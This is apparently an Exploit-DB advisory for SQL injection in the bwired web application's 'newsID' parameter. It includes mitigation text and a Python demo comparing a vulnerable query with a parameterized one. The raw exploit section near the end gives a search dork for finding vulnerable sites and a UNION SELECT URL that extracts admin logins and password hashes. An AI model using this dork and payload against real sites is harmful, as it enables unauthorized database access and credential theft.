Author: MurderSkillz
CVSS: 7.5 (HIGH)
Vulnerability Class: Remote SQL Injection
CWE: 89
Patch Exists: NO
Year: 2007

bwired – Remote SQL Injection

The bwired web application is vulnerable to remote SQL injection. An attacker can exploit this vulnerability by injecting malicious SQL queries in the 'newsID' parameter of the index.php page. This can lead to unauthorized access to the database and potentially sensitive information disclosure.

Mitigation:

To mitigate this vulnerability, the developer should use parameterized queries or prepared statements to handle user input securely. Additionally, input validation and sanitization should be implemented to prevent SQL injection attacks.
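The following added example (not part of the advisory or the bwired code base) shows the two mitigations above side by side against a constructed in-memory SQLite schema. The table and column names `news`, `authuser`, `user_login` and `user_passwd` are stand-ins modelled on the advisory's payload and are assumptions, not the product's real schema; `fetch_news_vulnerable` reproduces the anti-pattern (request parameter concatenated into SQL), while `fetch_news_hardened` validates `newsID` as a positive integer and binds it as a query parameter.

```python
import re
import sqlite3


def build_demo_db():
    """Constructed in-memory database standing in for the application's store.

    The schema is an assumption for illustration only; it mirrors the column
    names seen in the advisory's payload so the contrast is easy to follow.
    """
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE authuser (user_login TEXT, user_passwd TEXT);
        INSERT INTO news VALUES (1, 'Launch', 'First post');
        INSERT INTO news VALUES (2, 'Update', 'Second post');
        INSERT INTO authuser VALUES ('admin', 'constructed-hash-placeholder');
        """
    )
    return conn


def fetch_news_vulnerable(conn, news_id):
    """Anti-pattern: the raw 'newsID' value is spliced into the SQL text.

    Any input that is not a bare integer changes the query's structure, which
    is exactly what a UNION-based payload relies on (CWE-89).
    """
    sql = "SELECT id, title, body FROM news WHERE id = " + news_id
    return conn.execute(sql).fetchall()


def fetch_news_hardened(conn, news_id):
    """Hardened lookup: validate the parameter, then bind it.

    1. Input validation: 'newsID' is an identifier, so only ASCII digits are
       acceptable. re.fullmatch rejects signs, spaces, keywords and Unicode
       digit look-alikes that str.isdigit() would let through.
    2. Parameterized query: the value is passed to the driver separately from
       the SQL text, so it can never be interpreted as SQL.
    """
    if not isinstance(news_id, str) or re.fullmatch(r"[0-9]+", news_id) is None:
        raise ValueError("newsID must be a positive integer")
    return conn.execute(
        "SELECT id, title, body FROM news WHERE id = ?", (int(news_id),)
    ).fetchall()


if __name__ == "__main__":
    db = build_demo_db()
    # Constructed input shaped like the advisory's payload, trimmed to the
    # three columns of the demo table.
    hostile = "-99 UNION ALL SELECT 1, user_login, user_passwd FROM authuser"
    print("vulnerable:", fetch_news_vulnerable(db, hostile))
    try:
        fetch_news_hardened(db, hostile)
    except ValueError as exc:
        print("hardened rejected input:", exc)
    print("hardened, valid id:", fetch_news_hardened(db, "1"))
```

Either layer alone would stop the UNION payload; both together are the right posture, because validation documents the parameter's contract at the edge while binding guarantees the query structure regardless of what validation misses.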

Exploit-DB raw data:

###############################################################################################
#         ___   ___                         _
#        / _ \ / _ \                       | |
#   __ _| | | | | | |_ __  ___   _ __   ___| |_
#  / _` | | | | | | | '_ \/ __| | '_ \ / _ \ __|
# | (_| | |_| | |_| | | | \__ \_| | | |  __/ |_
#  \__, |\___/ \___/|_| |_|___(_)_| |_|\___|\__|
#   __/ |
#  |___/
###############################################################################################
#Program Title ################################################################################
#bwired - Remote SQL Injection
#
#Note #######################################################################################
#There is also XSS, PHPSESSID session fixation, and cookie manipulation which I will not go into..
#The admin hash will be the same for all the sites I believe. Seeing all the sites are managed by the creator of the webapp.
#Script Website ##############################################################################
#http://web.bwired.com.au
#
#d0rk ######################################################################################
#"Powered by bwired" inurl:?newsID=
#
#Spl0it #########################################################################################
#http://vicsite.com/[pathtobwired]/index.php?newsID=-99%20union%20all%20select 1, 2,concat(user_login,0x20,0x3a,0x20,user_passwd),4, 5, 6, 7, 8, 9, 10, 11%20from%20authuser
#
#vuln discovered by ###############################################################################
#MurderSkillz
#
#shoutz: z3r0, fish, milf, ScUzZ, godxcel, clorox, katalyst, SyNiCaL, OD, pr0be, rezen, str0ke,
#fish, rey, canuck, c0ma, grumpy, err0r, sick, trintitty, asdfhacks.com , a59, freeillwill.com, fury,
#<S>, Bernard and everyone else at g00ns.net
###############################################################################################

# milw0rm.com [2007-07-22]